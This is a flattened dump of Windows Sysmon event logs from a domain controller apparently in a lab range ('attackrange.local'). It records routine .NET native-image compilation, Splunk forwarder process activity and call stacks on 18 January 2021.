10341000x80000000000000008932Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:44.896{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9270-6005-AE04-00000000A301}1508C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008931Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:44.834{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9270-6005-AD04-00000000A301}3508C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008930Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:44.818{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9270-6005-AD04-00000000A301}3508C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008929Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:44.818{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9270-6005-AD04-00000000A301}3508C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008928Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:44.771{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9270-6005-AC04-00000000A301}3244C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008927Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:44.771{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008926Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:44.771{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008925Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:44.771{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008924Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:44.771{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008923Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:44.771{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008922Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:44.771{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008921Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:44.771{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008920Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:44.771{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008919Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:44.771{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008918Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:44.771{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9270-6005-AC04-00000000A301}3244C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008917Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:44.771{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9270-6005-AC04-00000000A301}3244C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000008916Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:44.772{59A5CD1D-9270-6005-AC04-00000000A301}3244C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x80000000000000008915Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:44.756{59A5CD1D-9270-6005-AB04-00000000A301}4768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\12a0-0\UIAutomationTypes.dll2021-01-18 13:51:44.756 10341000x80000000000000008914Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:44.553{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9270-6005-AB04-00000000A301}4768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008913Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:44.537{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9270-6005-AB04-00000000A301}4768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008912Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:44.537{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9270-6005-AB04-00000000A301}4768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008911Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:44.490{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9270-6005-AA04-00000000A301}4204C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008910Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:44.475{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9270-6005-AA04-00000000A301}4204C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008909Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:44.475{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9270-6005-AA04-00000000A301}4204C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008908Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:44.428{59A5CD1D-9270-6005-A904-00000000A301}3028C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\bd4-0\UIAutomationProvider.dll2021-01-18 13:51:44.428 10341000x80000000000000008907Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 